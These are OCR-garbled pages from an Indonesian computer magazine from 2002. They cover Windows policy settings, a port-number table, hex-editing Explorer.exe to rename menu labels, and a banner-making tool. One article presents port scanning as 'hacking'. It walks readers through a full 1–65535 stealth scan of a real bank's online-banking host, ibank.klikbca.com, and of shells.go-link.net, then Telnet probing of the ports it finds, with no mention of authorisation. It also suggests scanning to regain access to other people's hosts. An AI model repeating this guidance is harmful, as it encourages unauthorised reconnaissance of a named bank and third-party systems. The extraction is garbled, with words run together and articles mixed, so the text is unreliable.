ter anda. Maka klik properti System →Restrictions, kemudianaktifkan [√]Option Disable Registry editing tools dan optionDisable MS-DOS prompt. Setelah itu klik OK, lalu simpan per-ubahan yang sudah diakukan dengan mengklik Save, atau dapatjuga melalui menu File → Save. Kini bila menjalankan programREGEDIT.EXE melalui Start →Run, lihat apa yang terjadi. Pesanyang sama akan terlihat seperti pada gambar di bawah ini.Arti-nya tidak diperkenankan menjalankan program tersebut.Dengancara yang sama silahkan coba properti-properti yang lain.

4

Properti yang dapat di-setting pada Local UserJika sistem pada komputer anda hanyadioperasikan secara individual, maka objek yanganda pilih adalah Local User. Pada Local Userterdapat 5 buah properti yang nantinya akan andasetting, seperti tampak pada gambar di samping.

3

mengingat pada waktu itu securitymasih belum banyak dipikirkan olehMicrosoft.

Di versi Win2K dan WinXp,Microsoft telah banyak melakukanperubahan.

Penjelasan langsung di aplikasinyamempermudah user untuk langsungmengubah security di local computerdengan lebih detail dan spesifik.

Kalau rekan-rekan neoteker mem-buka Kategori Account Policies, akannampak jelas segalanya seperti kalaukita membuka dan bermain diRegistry Editor (regedit).

Harap berhati-hati karenaperubahan yang tidak terpikirkandapat mengakibatkan system error.

Account Policies menerangkanbatasan account ID yang dibuat dilocal computer, dan terdiri dari

Password PolicyAccount Lockout Policy.

Gambar terakhir menampakkan duabelah bagian dari aplikasi.

Window pane sebelah kiri adalahpolicy folder yang akan dimainkandan window pane sebelah kanan

merupakan isi dari masing-masingpolicy.

Seperti terlihat pada gambar,terdapat lima batasan (lima policy)pada dari Password Policy, yangmasing-masing dapat diubah dengan

meng--klik kanan mouse dankemudian klik Properties.

NeoTekno

Juli 2002 NeoTek 41

STILAH PORT NUMBER BAGI PENGGUNA Internet tentubukan hal yang asing lagi karena begitu sering dipakaipada saat mengakses layanan yang ada di Internet. Mi-

salnya port 194 dipakai untuk protokol IRC, port 1080 untukSOCKS (proxy IRC), port 21 untuk FTP, port 80 atau 8080untuk HTTP (WWW), port 25 untuk SMTP (E-mail), port 22untuk SSH (Secure Shell), dan port 23 untuk Telnet. Sedang-kan UltraScan adalah sebuah program port scanning ciptaanMichael Marchuk. Jika tertarik, anda dapat men-download-nyadari www.point1.com/UltraScan/UltraScan_v.1.5.EXE ataumenginstalnya dari CD NeoTek bulan ini.

Untuk melacak port number dengan menggunakan UltraScan,yang pertama kali harus dilakukan adalah menyiapkan alamatIP dari host yang akan dilacak. Misalnya anda akan melacakport number berapa saja yang aktif pada host ibank.klikbca.com, anda harus mengetahui atau me-reverse nama hostibank.klikbca.com ke bentuk IP terlebih dahulu.

Ada dua buah cara yang paling umum untuk me-reversedomain (hostname) menjadi IP atau dari IP menjadi domain:

1. Dengan mengetik perintah /DNS [hostname] di IRC.Contoh: /DNS ibank.klikbca.com, hasilnya terlihat padagambar berikut.

2. Dengan memanfaatkan utilitas nslookup yang banyak ter-dapat pada Web, salah satunya adalah di http://dns411.com.Anda cukup mengetikkan nama host yang akan anda reverseke dalam field NSLOOKUP, klik tombol Search, kemudianlihat hasilnya seperti tampak pada gambar di bawah ini.

Selanjutnya copy dan paste alamat IP tersebut di atas ke dalamfield TCP/IP Host Start Range dan TCP/IP Host End Rangepada program UltraScan.

Agar tidak ada port number yang terlewatkan pada saat prosesstealth probe berlangsung, dan anda memiliki kesabaran yangcukup tinggi untuk menunggu hasilnya, maka Anda dapatmengisi nomor port maksimal yang akan di-scan ke dalamfield Scan ports to, yakni mulai dari range port 1 − 65535.Setelah itu klik tombol Scan, dan tunggu hasilnya.

Sebagai bahan eksperimen, cobalah reverse host shells.go-

PPort Numberort NumberJika anda menggunakan sistem Microsoft Windows 95/97/98/2000/ME atau NT, dan menyukai hacking,ada cara yang lebih praktis untuk melacak port number pada host komputer jauh (remote system), yaitudengan menggunakan perangkat lunak UltraScan. Dengan UltraScan, dijamin anda tidak akan mengalami

kegagalan saat melakukan stealth probe. Eryanto Sitorus menguraikan cara penggunaannya dilengkapidengan tabel port number yang lazim digunakan.

dan Cardan Cara Melaca Melacaknyaaknya

I

• Me-reverse domain (hostname) menjadi IP dari IRC.

• Me-reverse domain (hostname) menjadi IP dari Web.

NeoTekno

42 NeoTek Juli 2002

link.net, kemudian jalankan program UltraScan, anda akanmenemukan begitu banyak port number yang aktif pada hosttersebut seperti yang tampa pada gambar di bawah ini.

Anda memperoleh begitu banyak port number aktif pada hostyang berhasil anda lacak. Lalu muncul pertanyaan, “Layananapa saja yang memakai nomor-nomor port tersebut?”Jawabnya ada dua, yaitu:

Kalau senang mencoba-coba sesuatu yang belum pasti (ta-hap awal untuk menjadi seorang hacker), anda boleh mencobasalah satu port number tersebut. Misal lewat program Telnet,yaitu dengan mengetik IP atau host ke dalam field Host Name,kemudian ketik nomor port yang akan anda test ke dalam fieldPort, lalu klik tombol Connect. Tunggu sebentar hingga benar-benar tersambung. Setelah itu anda akan segera mengetahuinama layanan atau program yang menempati port numbertersebut

Baca informasi yang diperlihatkan pada tabel port numberyang disertakan pada artikel ini. Namun sebelum itu andaperlu mengetahui sedikit informasi tentang port number:

Internet Assigned Numbers Authority (IANA) yang merupa-kan sub dari Internet Architecture Board (IAB)—sebuah badankoordinasi dan penasihat teknis bagi masyarakat penggunaInternet, membagi port number ke dalam tiga jarak (range).

- Range pertama,port 0-1023,disebut Well Known Port Numbers.- Range kedua,port 1024-49151,disebut Registered Port Numbers.- Range ketiga, port 49152-65535, disebut Dynamic Ports atau

Private Ports.

Namun demikian, anda jangan terkecoh oleh keterangan portnumber pada tabel setelah program UltraScan menampilkannomor-nomor port yang terlacak, karena belum tentu hasilnyasama dengan keterangan di tabel. Oleh karena itu, anda perlumemastikannya terlebih dahulu.Cara paling gampang untuk mengetahui nama layanan atauprogram yang menempati port number adalah dengan meng-gunakan program IRC:∇ Jalankan program mIRC client Anda.∇ Pada jendela status ketik /SERVER [IP/Hostname] <port

number>.Contoh: /SERVER 66.252.4.2 1980

∇ Kemudian lihat informasi yang muncul pada jendela statusprogram mIRC setelah perintah tersebut di atas anda Enter.Hasil yang sama juga terlihat pada gambar di bawah ini.

Dari informasi di atas, dapat kita ketahui bahwa ternyataprogram yang menempati nomor port 1980 adalah psyBNCversi 2.2.1, padahal keterangan di tabel, layanan atau programyang seharusnya menempati nomor port 1980 adalahPearlDoc XACT.

Buat Anda yang memperoleh akses ke host BNC, EZBNC,atau psyBNC orang lain dari hasil trade, dan sering kesalkarena tidak bisa lagi menggunakannya karena port number-nya telah diubah oleh si pemilik (Supervisor/Admin) tanpamemberitahu anda, maka teknik port scanning menggunakanprogram UltraScan bisa anda jadikan acuan yang tepat untukmelacak port-port number yang telah berubah itu.

• Melacak port number aktif ibank.klikbca.com menggunakan UltraScan.

• Port number yang aktif pada shells.go-link.net.

• Memasukkan IP ke dalam field hostname Telnet.

• Memeriksa program yang menempati port lewat program mIRC.

• Memeriksa program yang menempati port lewat Telnet.

NeoTekno

Juli 2002 NeoTek 43

1 TCP Port Service Multiplexer (tcpmux)2 Management Utility3 Compression Process5 Remote Job Entry11 Active Users13 Daytime17 Quote of the Day18 Message Send Protocol19 Character Generator20 File Transfer (Data)21 File Transfer (Control)22 SSH Remote Login Protocol23 Telnet24 Private Mail System25 Simple Mail Transfer Protocol (SMTP)29 MSG ICP31 MSG Authentication33 Display Support Protocol35 Private Printer Server37 Time38 Route Access Protocol39 Resource Location Protocol42 Host Name Server43 Who Is45 Message Processing Module48 Digital Audit Daemon49 Login Host Protocol50 Remote Mail Checking Protocol51 IMP Logical Address Maintenance52 XNS Time Protocol53 Domain Name Server57 Private Terminal Access59 Private File Service63 Whois++66 Oracle SQL*NET67 Bootstrap Protocol Server68 Bootstrap Protocol Client69 Trivial File Transfer70 Gopher71–74 Remote Job Service75 Private Dial Out Service79 Finger80 World Wide Web HTTP81 HOSTS2 Name Server84 Common Trace Facility87 Private Terminal Link88 Kerberos89 SU/MIT Telnet Gateway92 Network Printing Protocol93 Device Control Protocol99 Metagram Relay101 NIC Host Name Server103 Genesis Point-to-Point Trans Net105 CCSO Name Server Protocol 105 Mailbox Name Nameserver107 Remote Telnet Service108 SNA Gateway Access Server109 Post Office Protocol - Version 2110 Post Office Protocol - Version 3111 SUN Remote Procedure Call112 McIDAS Data Transmission Protocol113 Authentication Service (Ident)114 Audio News Multicast

115 Simple File Transfer Protocol117 UUCP Path Service118 SQL Services119 Network News Transfer Protocol (NNTP)123 Network Time Protocol125 Locus PC-Interface Net Map Server126 Unisys Unitary Login127 Locus PC-Interface Conn Server129 Password Generator Protocol130 Cisco FNATIVE131 Cisco TNATIVE132 Cisco SYSMAINT133 Statistics Service134 INGRES-NET Service135 DCE Endpoint Resolution136 PROFILE Naming System137 NETBIOS Name Service138 NETBIOS Datagram Service139 NETBIOS Session Service143 Internet Message Access Protocol (IMAP)144 Universal Management Architecture (UMA)150 SQL-NET152 Background File Transfer Program156 SQL Service157 KNET/VM Command/Message Protocol158 PCMail Server159 NSS-Routing160 SGMP-TRAPS161 SNMP162 SNMPTRAP163 CMIP/TCP Manager164 CMIP/TCP Agent169 SEND170 Network PostScript174 MAILQ177 X Display Manager Control Protocol178 NextStep Window Server179 Border Gateway Protocol187 Application Communication Interface189 Queued File Transport190 Gateway Access Control Protocol191 Prospero Directory Service192 OSU Network Monitoring System193 Spider Remote Monitoring Protocol194 Internet Relay Chat Protocol197 Directory Location Service198 Directory Location Service Monitor200 IBM System Resource Controller201 AppleTalk Routing Maintenance202 AppleTalk Name Binding204 AppleTalk Echo206 AppleTalk Zone Information209 Quick Mail Transfer Protocol213 IPX217 dBASE Unix218 Netix Message Posting Protocol220 Interactive Mail Access Protocol v3221 Berkeley rlogind with SPX Auth222 Berkeley rshd with SPX Auth223 Certificate Distribution Center244 Inbusiness245 LINK246 Display Systems Protocol

257 Secure Electronic Transaction258 Yak Winsock Personal Chat259 Efficient Short Remote Operations260 Openport261 IIOP Name Service over TLS/SSL280 HTTP-MGMT281 Personal Link282 Cable Port A/X311 AppleShare IP WebAdmin344 Prospero Data Access Protocol396 Novell Netware over IP397 Multi Protocol Trans. Net.399 ISO Transport Class 2 Non-Control over TCP400 Workstation Solutions401 Uninterruptible Power Supply (UPS)406 Interactive Mail Support Protocol408 Prospero Resource Manager Sys. Man.409 Prospero Resource Manager Node Man.411 Remote MT Protocol412 Trap Convention Port413 Storage Management Services Protocol414 InfoSeek423 IBM Operations Planning and Control Start424 IBM Operations Planning and Control Track427 Server Location434 MobileIP-Agent435 MobileIP-MN442 CVC_HOSTD443 HTTP Protocol Over TLS/SSL444 Simple Network Paging Protocol445 Microsoft-DS448 DDM-SSL449 AS Server Mapper451 Cray Network Semaphore Server452 Cray SFS Config Server453 CreativeServer454 ContentServer455 CreativePartnr457 SCOHELP458 Apple Quick Time464 KPASSWD469 Radio Control Protocol470 SCX-Proxy473 Hybrid-POP484 Integra Software Management Environment488 GSS-HTTP489 Nest-Protocol511 PassGo512 EXEC513 Login514 CMD515 Printer Spooler517 Talk518 NTalk519 Unix Time520 Router521 RPing525 Timeserver526 Newdate527 Stock IXChange528 Customer IXChange531 Chat532 Readnews

533 Emergency Broadcasts534 MegaMedia Admin537 Networked Media Streaming Protocol540 UUCPD541 UUCP-rlogin542 Commerce546 DHCPv6 Client547 DHCPv6 Server550 New-Who551 CyberCash552 Deviceshare554 Real Time Stream Control Protocol556 RFS Server560–561 Rmonitord562 CHCMD563 NNTP Protocol Over TLS/SSL565 Whoami574 FTP Software Agent System581 Bundle Discovery Protocol582 SCC Security583 Philips Video-Conferencing584 Key Server585 IMAP4+SSL586 Password Change587 Submission591 FileMaker, Inc.—HTTP Alternate592 Eudora Set593 HTTP RPC Ep Map614 SSLshell615 Internet Configuration Manager616 SCO System Administration Server617 SCO Desktop Administration Server620 SCO WebServer Manager624 Crypto Admin631 IPP (Internet Printing Protocol)633 Service Status update (Sterling Software)636 LDAP Protocol Over TLS/SSL537 Lanserver648 Registry Registrar Protocol (RRP)652 HELLO_PORT660 MacOS Server Admin677 Virtual Presence Protocol691 MS Exchange Routing699 Access Network705 AgentX709 Entrust Key Management Service Handler710 Entrust Administration Service Handler711 Cisco TDP729 IBM NetView DM/6000 Server/Client730 IBM NetView DM/6000 send/tcp731 IBM NetView DM/6000 receive/tcp744 Flexible License Manager747 Fujitsu Device Control749 Kerberos Administration750 Kerberos Version IV767 Phonebook777 Multiling HTTP989 FTP Protocol, Data, Over TLS/SSL990 FTP Protocol, Control, Over TLS/SSL991 Netnews Administration System992 Telnet Protocol Over TLS/SSL993 IMAP4 Protocol Over TLS/SSL994/995 IRC/POP3 Protocol Over TLS/SSL

Tabel 2. Daftar beberapa Registered Port Numbers yang umum digunakan

Tabel 1. Daftar beberapa Well Known Port Numbers yang umum digunakan

1025 Network Blackjack1036 RADAR Service Protocol1045 Fingerprint Image Transfer Protocol1052 Dynamic DNS Tools (DDT)1053 Remote Assistant (RA)1067 Installation Bootstrap Protocol Server1068 Installation Bootstrap Protocol Client1073 BridgeControl1080 SOCKS1092 Open Business Reporting Protocol1096 Common Name Resolution Protocol1097 Sun Cluster Manager1102–1103 ADOBE SERVER1110 Cluster Status Info1112 Intelligent Communication Protocol1114 Mini SQL1155 Network File Access1180 Millicent Client Proxy1183 LL Surfup HTTP1184 LL Surfup HTTPS1188 HP Web Admin1203 License Validation1204 Log Request Listener1215 scanSTAT 1.01220 QT SERVER ADMIN1227 DNS2go1234 Infoseek Search Agent1243 Serialgateway1246 Payrouter1255 DE-Cache-Query1256 DE-Server1257 Shockwave 21258 Open Network Library1259 Open Network Library Voice1267 pcmlinux1278–1279 DELL Web Admin1283 ProductInfo1296 DProxy1297 SDProxy1314 Photoscript Distributed Printing System1333 Password Policy1334 Writesrv1336 Instant Service Chat1346 Alta Analytics License Manager1347–1348 Multi Media Conferencing

1349–1350 Registration Network Protocol1352 Lotus Note1363 Network DataMover Requester1364 Network DataMover Server1365 Network Software Associates1366 Novell NetWare Comm Service Platform1369 GlobalView to Unix Shell1370 Unix Shell to GlobalView1389 Document Manager1390 Storage Controller1391 Storage Access Server1392 Print Manager1393 Network Log Server1394 Network Log Client1395 PC Workstation Manager software1397 Audio Active Mail1398 Video Active Mail1424 Hybrid Encryption Protocol1426 Satellite-data Acquisition System 11512 Microsoft's Windows Internet Name Service1516 Virtual Places Audio Data1517 Virtual Places Audio Control1518 Virtual Places Video Data1519 Virtual Places Video Control1520 ATM ZIP Office1595 Radio1612 NetBill Transaction Server1613 NetBill Key Repository1614 NetBill Credential Server1615 NetBill Authorization Server1616 NetBill Product Server1626 Shockwave1735 PrivateChat1739 Webaccess1745 Remote-Winsock1750 Simple Socket Library's Portmaster1942 Real Enterprise Service1973 Data Link Switching Remote Access Protocol1980 PearlDoc XACT1994 Cisco Serial Tunnel Port1995 Cisco Perf Port1996 Cisco Remote SRB Port1997 Cisco Gateway Discovery Protocol1998 Cisco X.25 Service (XOT)1999 Cisco Identification Port

2121 SCIENTIA-SSDB2146 Live Vault Admin Event Notification2147 Live Vault Authentication2180 Millicent Vendor Gateway Server2221–2223 Rockwell CSP1 - 32248 User Management Service2302 Bindery Support2303 Proxy Gateway2311 Message Service2346 Game Connection Port2347 Game Announcement and Location2348 Information to query for game status2349 Diagnostics Port2367 Service Control2368 Opentable2427 Media Gateway Control Protocol Gateway2450 Netadmin2451 Netchat2452 Snifferclient2463 Symbios Raid2478 SecurSight Authentication Server (SSL)2479 SecurSight Event Logging Server (SSL)2495 Fast Remote Services2500 Resource Tracking system server2533 SnifferServer2567 Cisco Line Protocol2576 TCL Pro Debugger2593 MNS Mail Notice Service2594 Data Base Server2667 Alarm Clock Server2727 Media Gateway Control Protocol Call Agent2764 Data Insurance2770 Veronica2784 World Wide Web—Development2860–2861 Dialpad Voice 1–22976 CNS Server Port2980 Instant Messaging Service2987 Identify3000 Remoteware Client3001 Redwood Broker3006 Instant Internet Admin3007 Lotus Mail Tracking Agent Protocol3011 Trusted Web3012 Trusted Web Client3014 Broker Service

3016 Notify Server3017 Event Listener3018 Service Registry3031 Remote Appleevents/PPC Toolbox3032 Redwood Chat3044 Endpoint Protocol3060 Interserver3073 Very Simple Chatroom Protocol3092 Netware Sync Services3107 Business Protocol3108 Geolocate Protocol3110 Simulator Control Portocol3111 Web Synchronous Services3195–3196 Network Control Unit 1–23197–3198 Embrace Device Protocol Server 1–23203 Network Watcher Monitor3204 Network Watcher DB Access3303 OP Session Client3304 OP Session Server3306 MySQL3307 OP Session Proxy3311 MCNS Tel Ret3312 Application Management Server5190 America-Online5429 Billing and Accounting System Exchange5432 PostgreSQL Database5435 Data Tunneling Transceiver Linking (DTTL)5599 Enterprise Security Remote Install5600 Enterprise Security Manager5601 Enterprise Security Agent5680–5712 Unassigned5729 Openmail User Agent Layer6150–6252 Unassigned6583–6664 Unassigned6665–6669 IRCU6674–6700 Unassigned7777 CBT7779 VSTAT8008 HTTP Alternate8080 HTTP Alternate8133–8159 Unassigned8381–8399 Unassigned8474–8553 Unassigned49151 IANA Reserved

44 NeoTek Juli 2002

3 MEMBUKA EXPLORER.EXE Bukalah file Explorer.exe yang ter-letak di C:\ dengan memilih menuFile → Open atau dengan mene-kan CTRL+O. File Explorer.exe akanterbuka. File Explorer.exe siap di-oprek.

NeoStyle

ada NeoTek Vol. II, No. 7, April2002 kami telah menyajikan caramengubah tulisan Start pada

tombol ‘Start.’ Dengan menggunakanteknik serupa, pembaca dapat pula meng-ubah tulisan Shut Down dan Log out.Meski cara yang paling mudah adalahdengan bantuan tweaking tool semacamWinBoost, namun penulis mengajakpembaca untuk belajar mengubahnyasendiri dengan bantuan perangkat yangdisebut hex editor.

Untuk melakukan perubahan pada tulisanShut Down dan Log Off pada menu Startberarti pembaca harus melakukan modi-fikasi pada file Explorer.exe yang terletakdi direktori Windows.

MMEENNGGGGANANTTI I SSHHUUT DT DOOWWN & LN & LOOG OG OFFFFPPADADAA MMEENNU SU STTARARTTTulisan Shut Down dan Log Out dapat diubah dengan meng-gunakan perangkat yang dinamakan hex editor. HappyChandraleka mengajak anda sedikit ‘berpetualang’ di duniaWindows.

MENCARI LOG OFFSelanjutnya carilah tulisan Log Offdengan menggunakan fitur Go ToOffset. Pilihlah menu Position → GoTo Offset. Isikan dengan offset :28172. Opsi yang lainnya sama de-ngan Langkah 4. Tekan tombol OKuntuk berpindah ke offset tersebut.

TULISAN LOG OFF ITUKursor akan berpindah ke offset28172 yang merupakan awaltulisan Log Off yang dimaksud.Tulisan memanjang dari offset28172 sepanjang F h offset. Inilahyang akan kita ganti.

MEM-BACKUP FILE EXPLORER.EXESeperti biasa, buat backup fileExplorer.exe yang berada di direk-tori Windows ke disket dan copy-kan juga ke drive C:\ . FileExplorer.exe yang berada di driveC:\ inilah yang akan kita utak-utik. Jangan meng-oprek filetersebut di direktori Windows.

MENJALANKAN WINHEXJalankan WinHex yang telah diins-tal. Anda akan dihadapkan padajendela WinHex dengan tulisanWinHex 9.72 di tengah layar, yangbeberapa saat kemudian akanhilang.

1

7 8

2

Praktik mengganti ‘Shut Down’ dan ‘Log Off’ pada menu Start

MENGGANTI LOG OFFBerpindahlah ke bagian teks di se-belah kanan. Gantilah tulisan “& Lo g O f f” tersebut dengan “& K el u a r :” sehingga isi dalam bilang-an hexadesimalnya adalah : 26 004B 00 65 00 6C 00 75 00 61 0072 00 3A. Jangan lakukanperubahan lain.

9

P

Juli 2002 NeoTek 45

NeoStyle

MENG-UPDATE EXPLORER.EXESimpan perubahan-perubahanyang anda lakukan dengan me-milih menu File → Save atau cu-kup dengan menekan CTRL + S.Akan tampil kotak dialogkonfirmasi, jawablah denganmenekan tombol Yes.

MENGGANTI FILE EXPLORERUntuk mengganti file Explorer yangberada di direktori Windows denganfile Explorer yang telah dimodifi-kasi, anda perlu masuk ke DOSmode. Pilih Start | Shut Down danpilih opsi Restart in MS-Dos Mode.Selanjutnya ketikkan perintahcopy C:\Explorer.exe C:\Windows.Pilih Y pada konfirmasi yang ada.

MENCARI DENGAN ‘GO TO OFFSET’Pilih menu Position → Go ToOffset atau tombol ALT+G untukmencari tulisan Shut Down padaStart Menu. Isi kotak New Positiondengan 281E2, pilihan Relative todengan Beginning of file dan ak-tifkan tombol Byte. Tekan OK.

TULISAN SHUT DOWN ITUKursor akan mengarah pada offset281E2 yang merupakan awal offsetuntuk tulisan Shut Down yang di-maksud. Sepanjang 13h offset darioffset ini memuat tulisan ShutDown. Tulisan inilah yang akan kitaganti.

4

10 11

5 MENGGANTI SHUT DOWNBerpindahlah ke modus teks yangterletak di sebelah kanan jendelaWinHex untuk memudahkan mo-difikasi dan gantilah kata “S h & u tD o w n” dengan “M a & t i k a n PC.” Bila anda mengubah bilanganhexadesimalnya adalah “4D 00 6100 26 00 74 00 69 00 6B 00 61 006E 00 50 00 43 00.”

6

TARRA …Akhirnya masuklah lagi ke modusWindows dengan mengetikkan"Exit". Apabila pembaca mela-kukan semua langkah denganbenar, maka tulisan Log Off danShut Down telah berganti.

12

Pada tutorial kali ini hex editor yangkami gunakan adalah WinHex versi9.72 yang masih merupakan versievaluasi dan belum teregistrasi.WinHex sudah cukup populer di duniacracking dan pernah dimuat di CDNeoTek II - 4, Januari 2002 dan di-muat kembali di CD Neotek bulan ini.Perangkat ini memiliki fitur/fasilitasyang cukup banyak dan lengkap yangdiperlukan untuk membantu melaku-kan kegiatan cracking suatu file.Fasilitas yang dapat anda jumpai didalamnya antara lain adalah Go To,Search, File Compare, Disk Editor,Ram Editor, dll termasuk dukunganuntuk modifikasi dalam modus teks.

Fasilitas yang terakhir ini yang dapatanda gunakan untuk memodifikasistring (tulisan) dalam sebuah file. Dandengan fasilitas ini pulalah kami de-ngan mudah dapat mengubah tulisanShut Down dan Log Out seperti yangkami uraikan langkah demi langkah dibawah ini sehingga anda akan mudahmengikuti serta mempraktikkannya.

Keunikan lain dari WinHex adalahprogram ini mendukung enam bahasadunia, sehingga tidaklah terlalumengherankan jika program ini cukuppopuler di kalangan pengguna Internetdi dunia.

Tweaking Membuatpenyesuaian atau perubah-an kecil pada suatu sistemelektronik atau perangkat lunak terutamauntuk meningkatkan fungsi atau mutunyaatau memperbaikinya.

Hex editor Program yang pada awalnyapada sistem UNIX. Sebagai editor, programini memungkinkan pengguna melihat danmengedit atau menyunting file-file heksade-simal pada ASCII. Hex editor biasanyadilengkapi dengan fitur untuk mengubah isifile atau mencari item tertentu pada filetersebut.

Cracking Selain digunakan untuk men-deskripsikan kegiatan ilegal untuk masuk kedalam suatu sistem komputer, crack jugabisa berarti meng-copy perangkat lunakkomersial secara ilegal dengan membongkarpelindung program itu dan pelindungregistrasinya.

DDAFAFTTARARIISSTTIILLAHAH

46 NeoTek Juli 2002

3 PILIH LATAR BELAKANGSilahkan pilih latar belakangsesuai dengan selera anda. Andadapat memilih latar belakangberupa gambar atau hanya berupawarna. Klik Next

NeoStyle

alam membuat halama Web, kitasebelumnya harus memikirkanjuga mengenai pembuatan banner

dan tombol-tombol yang akan ditampilkanWeb kita. Membuat banner dengan efekdan daya tarik yang baik. Namun kini telahada perangkat khusus yang akan memper-mudah anda merancang banner sesuaidengan selera anda.

Tools ini adalah Banner Maker Pro2 yangdikembangkan oleh GatorData, Inc.Aplikasi ini membantu anda dalam pem-buatan grafik untuk Web seperti bannerdan tombol yang akan menambah nilailebih Web anda. Banner Maker Pro2menyediakan banyak sekali gambar untuklatar belakang dan efek yang dapat anda

MMEEMMBBUUAAT BT BANANNNEERRPPRROOFFEESSIIOONAL DNAL DEENNGGANANBBANANNNEER MAKR MAKEER PR PRRO2O2Kini anda tidak perlu bingung dalam membuat banner atautombol untuk halaman Web anda. Cukup dengan meng-gunakan Banner Maker Pro2, anda dapat membuat banneryang menarik dan profesional.

MEMASUKKAN TEKSMasukkan teks ke dalam banneranda. Ketiikan teks yang andainginkan di kolom sebelah tombolNew Text, dan kemudian aturlanwana, besar, bentuk, serta posisihurufnya.

MEMBERI EFEK TEKS Pada langkah ini, anda dapatmemberikan teks anda efek 3D.anda bisa merubah tampilan teks,memberi warna gradient padateks, dan sebagainya. Silahkansesuaikan dengan selera anda. jikasudah klik Next

BUKA BANNER MAKER PRO2Jalankan program Banner MakerPro2 anda setelah anda meng-instalnya. Anda akan melihattampilan awal program sepertipada gambar di atas. Klik tombolBegin

UKURAN BANNERPada langkah kedua, anda akandiminta untuk menentukanukuran banner yang akan andabuat. Untuk lebar dan tinggibanner, silakan sesuaikan dengankebutuhan anda. Klik Next

1

7 8

2

Menciptakan banner yang cantik dengan mudah.

MENYIMPAN FILESimpanlah pekerjaan anda dalamformat JPEG atau GIF. Anda jugabisa melakukan Compressionuntuk meminimalisasi besar fileanda. Ini merupakan langkahterakhir jika anda membuatBanner Static

9

D

Juli 2002 NeoTek 47

NeoStyle

MEMBUAT BANNER ANIMASIUntuk mmbuat animasi, andamemerlukan file GIF. Untuk itu,anda dapat menggunakan hasilpekerjaan sebelumnya yaitu fileGIF yang telah disimpan. kinikembalilah ke tab Text danmasukkan teks lainnya.

SIMPAN FILESetelah anda memberikan efekterhadap teks yang baru andamasukkan, simpanlah kembalidengan nama file yang berbedadalam format GIF.

TENTUKAN BORDERSilahkan tentukan border anda,mulai dari bentuk, efek sertaketebalannya ada di sini semua.Klik Next

MEMBUAT SHAPEShape dapat anda gunakan untukmembuat efek 3D. Untuk mem-buat Shape baru, anda tinggalmengklik tombol New Shape dantentukan bentuk, tebal danwarnanya. Klik Next

4

10 11

5 MENAMBAHKAN GAMBARSelain memanipulasi teks, andapun dapat menambahkan gambaruntuk banner anda. Klik tombolAdd Image dan pilih gambar yangakan anda tambahkan. Klik Next

6

ANIMATIONKlik tombol Add GIF to AnimationList, lalu masukkan kedua file yangtelah anda buat tadi. Silakan aturwaktu dan Properties animasi lain-nya. Lalu klik tombol Save Animat-ed Image. Untuk hasil animasi anda,klik tombol View Animated GIF.

12

gunakan. Melalui tampilan wizard-nya Banner Maker akan menuntunanda langkah per langkah dalammembuat banner yang profesional,tombol, dan berbagai macam gambarkecil hanya dalam beberapa menit.Pada saat program ini dijalankanuntuk pertama kali, anda akanberhadapan dengan beberapa tabyang ada pada posisi atas program.

Yang anda perlu lakukan dalammembuat banner yang menarikadalah mengikuti tab-tab tersebutlangkah demi langkah hingga keproses pembuatan grafik. Berbagaimacam pilihan dapat anda gunakandalam memanipulasi teks dari warna

hingga ke 3D. Anda hanya perlumengklik tombol ‘Begin’ ketikapertama kali menjalankan programini, dan selanjutnya ikuti sajalangkah per langkahnya.

Program ini sangat powerful dalammembuat banner. Anda tidak perlumembuat latar belakangnya sendiri,karena Banner Maker Pro2 menye-diakan lebih dari 20 motif latarbelakang. Dengan sedikit latihan,anda dapat menciptakan sebuahanimasi banner yang sangat menarikdan profesional yang dapat andaletakkan di halaman Web anda ataudapat digunakan untuk pertukaranbanner. Ketika anda selesai membuat

banner, simpanlah sebagai GIF atauJPEG. Untuk yang bersifat animasi,anda perlu menyimpannya menjadiformat Animatid GIF.